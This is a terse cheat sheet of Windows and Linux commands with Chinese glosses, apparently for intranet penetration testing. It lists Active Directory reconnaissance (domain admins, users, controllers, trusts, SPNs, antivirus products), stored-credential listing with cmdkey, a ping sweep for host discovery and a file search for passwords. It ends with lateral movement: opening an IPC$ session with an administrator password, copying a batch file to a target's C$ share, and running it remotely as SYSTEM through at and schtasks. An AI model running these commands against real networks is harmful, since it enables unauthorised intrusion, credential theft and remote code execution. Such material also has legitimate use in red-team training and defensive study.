net view /domain:XXX
查看XXX域中的机器列表
net view /domain
查看内网中有多少个域
setspn -T jumbolab.com -Q */*
快速寻找内网中注册的服务
net user /domain
查看域用户
net group "domain admins" /domain
查看域管
net time /domain
定位域控。也可以通过ipconfig /all。一般DNS就是域控
nltest /domain_trusts
列出域信任关系
cmdkey /list
远程连接凭据
nslookup -type=ns domain.com
域传输漏洞。查找所有的DNS解析
dsquery computer domainroot -limit 65535 && net group "domain computers" /domain
列出该域内所有机器名
dsquery user domainroot -limit 65535 && net user /domain
列出该域内所有用户名
dsquery subnet
列出该域内网段划分
dsquery group && net group /domain
列出该域内分组
dsquery ou
列出该域内组织单位
dsquery server && net time /domain
列出该域内域控制器
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
列出杀软
wmic product get name,version
查看安装的软件
quser
查看在线用户
net config workstation
查看当前登陆域
dnsdump.exe -u 域名\与用户 -p 域密码 域控机器名
用普通域用户获取域内所有DNS解析
for /l %i in (1,1,255) do @ ping 10.233.33.%i -w 1 -n 1|find /i "ttl="
主机发现
find / -type f -uid +0
找不是root用户编辑的文件。用于找密码
tee可以替代>
IPC
net use \\IP\ipc$ "密码" /user:administrator
#建立IPC连接
net time \\IP
#获取远程IP的时间
copy calc.bat \\IP\C$
#把本地的calc.bat传到目标C盘
at \\IP 21:41 c:\calc.bat
#创建计划任务
at \\IP 21:41 cmd.exe /c "ipconfig > c:\1.txt"
#直接执行命令
type \\IP\C$\1.txt
#获取命令执行结果
schtasks /create /s IP /tn 计划任务名 /sconstart /tr c:\calc.bat /ru system /f
#用schtasks命令创建计划任务
schtasks /delete /s IP /tn "计划任务名" /f